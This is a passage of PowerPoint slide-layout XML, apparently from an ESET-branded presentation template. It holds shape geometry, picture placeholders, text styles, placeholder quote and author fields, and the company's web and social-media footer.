                  <a:pt x="461380" y="160605"/>
                  <a:pt x="459932" y="189787"/>
                  <a:pt x="457034" y="216692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="454136" y="243597"/>
                  <a:pt x="449376" y="268847"/>
                  <a:pt x="442753" y="292441"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="436131" y="316035"/>
                  <a:pt x="427231" y="339215"/>
                  <a:pt x="416055" y="361981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="404879" y="384747"/>
                  <a:pt x="391426" y="407720"/>
                  <a:pt x="375697" y="430900"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="215507" y="666839"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="210540" y="675117"/>
                  <a:pt x="204745" y="682154"/>
                  <a:pt x="198122" y="687949"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="191499" y="693744"/>
                  <a:pt x="183427" y="698504"/>
                  <a:pt x="173907" y="702230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="164387" y="705955"/>
                  <a:pt x="153211" y="708645"/>
                  <a:pt x="140379" y="710301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127547" y="711957"/>
                  <a:pt x="111611" y="712785"/>
                  <a:pt x="92570" y="712785"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71046" y="712785"/>
                  <a:pt x="53454" y="711957"/>
                  <a:pt x="39794" y="710301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26135" y="708645"/>
                  <a:pt x="16200" y="705541"/>
                  <a:pt x="9992" y="700988"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3783" y="696435"/>
                  <a:pt x="471" y="690847"/>
                  <a:pt x="57" y="684224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-357" y="677601"/>
                  <a:pt x="1506" y="669736"/>
                  <a:pt x="5645" y="660630"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="152176" y="321623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152176" y="129146"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="152176" y="100999"/>
                  <a:pt x="155073" y="78440"/>
                  <a:pt x="160868" y="61469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166663" y="44498"/>
                  <a:pt x="175977" y="31666"/>
                  <a:pt x="188809" y="22973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201640" y="14281"/>
                  <a:pt x="218197" y="8279"/>
                  <a:pt x="238480" y="4968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="258762" y="1656"/>
                  <a:pt x="282563" y="0"/>
                  <a:pt x="30988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 flipH="1">
            <a:off x="3783303" y="1705524"/>
            <a:ext cx="10721398" cy="60716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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quoted text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5CE22AC-E6C4-6D2D-094F-1EB20142DE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flipH="1">
            <a:off x="3783300" y="7996066"/>
            <a:ext cx="10721396" cy="5854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2400" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>— Author Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41848940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>
        <p:tmplLst>
          <p:tmpl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iterate type="lt">
                    <p:tmAbs val="3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5" grpId="0">
        <p:tmplLst>
          <p:tmpl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iterate type="lt">
                    <p:tmAbs val="3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</p15:sldGuideLst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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D447992B-7191-8F48-C815-56BE3F901FA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-21016274" y="-3704940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9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5CE22AC-E6C4-6D2D-094F-1EB20142DE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flipH="1">
            <a:off x="4359827" y="8256220"/>
            <a:ext cx="10999910" cy="58541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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>— Author Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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E3723680-C437-DAA3-F7E9-04CDD17FC9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48433" y="1"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7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9C8738FA-A56F-62F1-5680-0BBBDA9F3D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72516" y="3690786"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8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C99C2AD5-90B8-6D05-EF30-53A628A2BDE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9834" y="4697876"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9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ED7B3669-D805-0D78-240A-C00A8579D3D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0054" y="2393949"/>
            <a:ext cx="13591424" cy="191805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4CE2177-9344-00AC-AD2D-EE725BA2885C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295401" y="1356026"/>
            <a:ext cx="3734530" cy="2671688"/>
            <a:chOff x="3526971" y="2205037"/>
            <a:chExt cx="1552447" cy="111062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16F4150-5E2C-FFE3-1192-90B0BA766AC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3526971" y="2205037"/>
              <a:ext cx="703597" cy="1110623"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 703598 w 703597"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1110623"/>
                <a:gd name="connsiteX1" fmla="*/ 696811 w 703597"/>
                <a:gd name="connsiteY1" fmla="*/ 555312 h 1110623"/>
                <a:gd name="connsiteX2" fmla="*/ 203297 w 703597"/>
                <a:gd name="connsiteY2" fmla="*/ 1106726 h 1110623"/>
                <a:gd name="connsiteX3" fmla="*/ 86777 w 703597"/>
                <a:gd name="connsiteY3" fmla="*/ 1110624 h 1110623"/>
                <a:gd name="connsiteX4" fmla="*/ 335122 w 703597"/>
                <a:gd name="connsiteY4" fmla="*/ 566285 h 1110623"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 703597"/>
                <a:gd name="connsiteY5" fmla="*/ 566285 h 1110623"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 703597"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 1110623"/>
                <a:gd name="connsiteX7" fmla="*/ 703598 w 703597"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 111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597" h="1110623">
                  <a:moveTo>
                    <a:pt x="703598" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="696811" y="555312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203297" y="1106726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86777" y="1110624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335122" y="566285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="566285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703598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100000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="4200000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="1905000">
                <a:schemeClr val="accent4">
                  <a:alpha val="25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9BBD202-DC42-1962-1CB8-4016F54CEBF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4375821" y="2205037"/>
              <a:ext cx="703597" cy="1110623"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 703598 w 703597"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1110623"/>
                <a:gd name="connsiteX1" fmla="*/ 696811 w 703597"/>
                <a:gd name="connsiteY1" fmla="*/ 555312 h 1110623"/>
                <a:gd name="connsiteX2" fmla="*/ 203297 w 703597"/>
                <a:gd name="connsiteY2" fmla="*/ 1106726 h 1110623"/>
                <a:gd name="connsiteX3" fmla="*/ 86777 w 703597"/>
                <a:gd name="connsiteY3" fmla="*/ 1110624 h 1110623"/>
                <a:gd name="connsiteX4" fmla="*/ 335122 w 703597"/>
                <a:gd name="connsiteY4" fmla="*/ 566285 h 1110623"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 703597"/>
                <a:gd name="connsiteY5" fmla="*/ 566285 h 1110623"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 703597"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 1110623"/>
                <a:gd name="connsiteX7" fmla="*/ 703598 w 703597"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 111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3597" h="1110623">
                  <a:moveTo>
                    <a:pt x="703598" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="696811" y="555312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203297" y="1106726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86777" y="1110624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335122" y="566285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="566285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703598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100000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="4200000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="1905000">
                <a:schemeClr val="accent4">
                  <a:alpha val="25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6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 flipH="1">
            <a:off x="4359830" y="1705524"/>
            <a:ext cx="10999912" cy="607161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0" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="20000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quoted text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31556996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iterate type="lt">
                    <p:tmAbs val="3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4" grpId="0">
        <p:tmplLst>
          <p:tmpl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iterate type="lt">
                    <p:tmAbs val="3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</p15:sldGuideLst>
    </p:ext>
  </p:extLs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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D447992B-7191-8F48-C815-56BE3F901FA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-21596846" y="-3066310"/>
            <a:ext cx="38984960" cy="3898496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9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1B3CF623-E257-A2A4-7DFB-6C5B3832F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05646" y="8494476"/>
            <a:ext cx="3120056" cy="6186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65647A32-7A64-5B75-DCB8-5FD6F18782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482400" y="8636446"/>
            <a:ext cx="2510200" cy="3346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0691231-64A9-A855-DD52-F0851BCEE5B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994017" y="8619126"/>
            <a:ext cx="12299970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1828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1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.eset.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.welivesecurity.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> @ESETresearch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1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856E5A94-BCC8-6A7B-169A-C933BD52F00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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3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EE05BA72-5EEB-32E2-709E-A3C8EB6EDD7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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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8773A985-177D-8BA3-E3D1-D9CE1798262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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9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79E75E79-35E6-DECE-6DCE-56FD1DD63E3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Blur radius="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7178" y="0"/>
            <a:ext cx="13591424" cy="340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645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</p15:sldGuideLst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l (One present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LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B23BAA6-B5B0-3653-850E-C51602D9DDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1668239" y="-12845525"/>
            <a:ext cx="21767622" cy="19788746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9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509AC6C-DCF0-73B0-0B9E-5349CC0299C1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284204" y="1789838"/>
            <a:ext cx="3719592" cy="371959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CBC31BF-25F2-098E-E67E-BB351EACDD7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84300" y="6352290"/>
            <a:ext cx="15519400" cy="590931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" b="1" i="0" kern="1200" baseline="0" dirty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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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75702B1-D81E-EC8C-9FBA-ADCABFE4AC0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84300" y="6808602"/>
            <a:ext cx="15519400" cy="68326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buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5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B7F8BB3-DB79-E679-479E-83A9F07605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84300" y="7677343"/>
            <a:ext cx="15519400" cy="97437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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:buFontTx/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3BD2DE-4BC6-9620-0906-2238BD30D6F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994017" y="8619126"/>
            <a:ext cx="12299970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1828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1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.eset.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.welivesecurity.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> @ESETresearch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3058813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9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2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iterate type="lt">
                    <p:tmAbs val="3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iterate type="lt">
                    <p:tmAbs val="3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2" grpId="0" build="p" advAuto="0"/>
    </p:bldLst>
  </p:timing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140">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="3003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l (Two presente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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A337A13A-7E40-101C-1440-368DB88C4A56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2789438" y="-7508659"/>
            <a:ext cx="16501604" cy="15001458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9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5" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A859938-6BD4-DEC8-3ECE-176C21CEF7F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026502" y="-7543337"/>
            <a:ext cx="16501604" cy="15001458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9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F5B66E1-4629-B2B5-DA54-5AEC2A704C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00200" y="6260626"/>
            <a:ext cx="7330440" cy="590931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algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" b="1" i="0" kern="1200" baseline="0" dirty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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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AED7628-960D-F1D5-6366-45FBBDF9FE6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00200" y="6716938"/>
            <a:ext cx="7330440" cy="683264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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5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F93EFEC-4A43-7D87-C84D-500F02DF7A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00200" y="7614376"/>
            <a:ext cx="7330440" cy="9239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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2000" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:buFontTx/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58AF2636-3AF4-8A41-68A2-BEF66A662759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405624" y="1682674"/>
            <a:ext cx="3719592" cy="371959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0DDEB595-0E6F-DE20-5EEA-843F064FDFB9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11173580" y="1682674"/>
            <a:ext cx="3719592" cy="371959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938F17A-5B41-D0FD-702A-AAED9D37506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57364" y="6260626"/>
            <a:ext cx="7330440" cy="590931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algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" b="1" i="0" kern="1200" baseline="0" dirty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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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140CF8D6-CB66-BCE3-9DD7-B71E140BE9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57364" y="6716938"/>
            <a:ext cx="7330440" cy="683264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFontTx/>
